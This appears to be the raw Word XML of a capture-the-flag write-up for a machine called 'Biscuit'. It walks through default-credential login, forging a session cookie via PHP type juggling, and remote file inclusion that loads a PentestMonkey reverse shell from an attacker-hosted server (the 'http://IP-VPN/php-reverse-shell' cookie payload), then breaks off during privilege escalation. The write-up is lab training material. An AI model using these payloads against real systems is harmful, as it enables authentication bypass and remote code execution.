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BISCUIT</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30t11u11v47f"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5iog3vnkga4v"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4699000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6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y61tviz8xnoi"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C">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E">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have port 80 indicating that we have a website running, and we also have SSH on port 22.</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site, we see a login field.</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32300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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fbpwp214j2lp" w:id="7"/>
      <w:bookmarkEnd w:id="7"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans SemiBold" w:cs="IBM Plex Sans SemiBold" w:eastAsia="IBM Plex Sans SemiBold" w:hAnsi="IBM Plex Sans SemiBold"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">FUZZ:</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86200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="75"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performing file and directory fuzzing, we did not find anything interesting — only a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/class</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> directory containing a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sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> file.</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6050"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="63" name="image10.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image10.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId12"/>
                    <a:srcRect b="56037" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="20560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Returning to the login page, we can try some default credentials:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001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admin:admin  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001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root:root  </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administration:administration  </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guest:guest  </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Trying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guest:guest</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, we successfully log into the system.</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18000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6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Apparently, we only have a welcome page. However, by inspecting the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Storage</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> section in the browser, we see a session cookie.</w:t>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11500"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">CyberChef</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to decode the cookie, we can see that it is a JSON-formatted cookie containing three values:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000021">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hmac</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Hash Message Authentication Code, provides a mechanism to verify user authenticity and ensure that a message has not been tampered with.</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sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> – username</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000023">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expiration</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> – expiration time for the cookie</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56100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6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modify the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and then encode it again in </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">base64 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">+ url_encode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73500"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="55"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replacing the cookie, we receive an error message — and a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">flag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59"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4h1s9qz6occi" w:id="8"/>
      <w:bookmarkEnd w:id="8"/>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s1h737p015xg" w:id="9"/>
      <w:bookmarkEnd w:id="9"/>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1rvbgfz0kg7p" w:id="10"/>
      <w:bookmarkEnd w:id="10"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans SemiBold" w:cs="IBM Plex Sans SemiBold" w:eastAsia="IBM Plex Sans SemiBold" w:hAnsi="IBM Plex Sans SemiBold"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Exploitation:</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There is a well-known vulnerability in PHP called </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Type Juggling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D">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PHP has a feature called “type juggling” or “type coercion.” This means that when comparing variables of different types, PHP first converts them into a common comparable type.</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type juggling issues can be exploited if the application accepts input through functions such as </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">json_decode()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or </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">unserialize()</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. This allows the end user to specify the input data type being transmitted.</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br w:type="textWrapping"/>
      </w:r>
      <w:hyperlink r:id="rId18">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://owasp.org/www-pdf-archive/PHPMagicTricks-TypeJuggling.pdf</w:t>
        </w:r>
      </w:hyperlink>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Consider the following JSON blobs:</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{"Password": "0"}</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{"Password": 0}</w:t>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first case, the password parameter is treated as a string.</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">In the second case, PHP interprets it as an integer.</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gives the attacker fine-grained control over the input data type and therefore the ability to exploit type juggling issues.</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Returning to the cookie exploitation, we can pass </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">true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the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">hmac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 This allows us to modify our cookie without validation issues.</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change the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 to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again, but now set the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">hmac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value to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">true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base64 + urlencode:</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2235200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="71"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{"hmac":true,"username":"admin","expiration":1630950564}</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successfully log in as </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">admin</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, but there is nothing interesting 🙁</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60800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6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passing a random value in the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 it returned an error page.</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194300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6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{"hmac":true,"username":"abcd","expiration":1630950564}</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22600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="7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error page, we can see that the application uses the function </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">require_once</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and automatically appends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sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to the end of our value.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000044">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="46"/>
          <w:szCs w:val="46"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">require_once</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> is used to include PHP pages and files. Since we control the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">username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field, we can attempt to exploit this behavior.</w:t>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abuse a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Remote File Inclusion (RFI)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> vulnerability.</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allows us to load and execute arbitrary code hosted remotely.</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 this, we will use a PHP reverse shell from PentestMonkey:</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https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php</w:t>
        </w:r>
      </w:hyperlink>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740400"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="57"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Next, we start a Python server to host our reverse shell file. When the application makes a request to our Python server, it will include our malicious file.</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2044700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="7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{"hmac":true,"username":"http://IP-VPN/php-reverse-shell","expiration":1630950564}</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rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Note: There is no need to add the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.php</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> extension, as the server appends it automatically.</w:t>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reverse connection:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000050">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349500"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="7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 the connection 😃</w:t>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6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rpx1mlymgxid" w:id="11"/>
      <w:bookmarkEnd w:id="11"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans SemiBold" w:cs="IBM Plex Sans SemiBold" w:eastAsia="IBM Plex Sans SemiBold" w:hAnsi="IBM Plex Sans SemiBold"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Shell tty</w:t>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5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find our second flag in the root directory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13100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="78"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6qlv06cgdzuf" w:id="12"/>
      <w:bookmarkEnd w:id="12"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans SemiBold" w:cs="IBM Plex Sans SemiBold" w:eastAsia="IBM Plex Sans SemiBold" w:hAnsi="IBM Plex Sans SemiBold"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ROOT</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005D">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y166p4294y6w" w:id="13"/>
      <w:bookmarkEnd w:id="13"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Format String Vulnerabilities</w:t>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Format strings are used in many programming languages to insert values into a text string. In some cases, this mechanism can be abused to perform buffer overflow attacks, extract information, or execute arbitrary code.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005F">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br w:type="textWrapping"/>
      </w:r>
      <w:hyperlink r:id="rId29">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.netsparker.com/blog/web-security/format-string-vulnerabilities/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006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43200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="79"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/opt</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, we see that we cannot read or modify the file </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">biscuit_checker.py</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, but we can execute it with root privileges.</w:t>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55900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="7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w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/var/www/html</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, there is a file called </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">block.ips.db.json</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
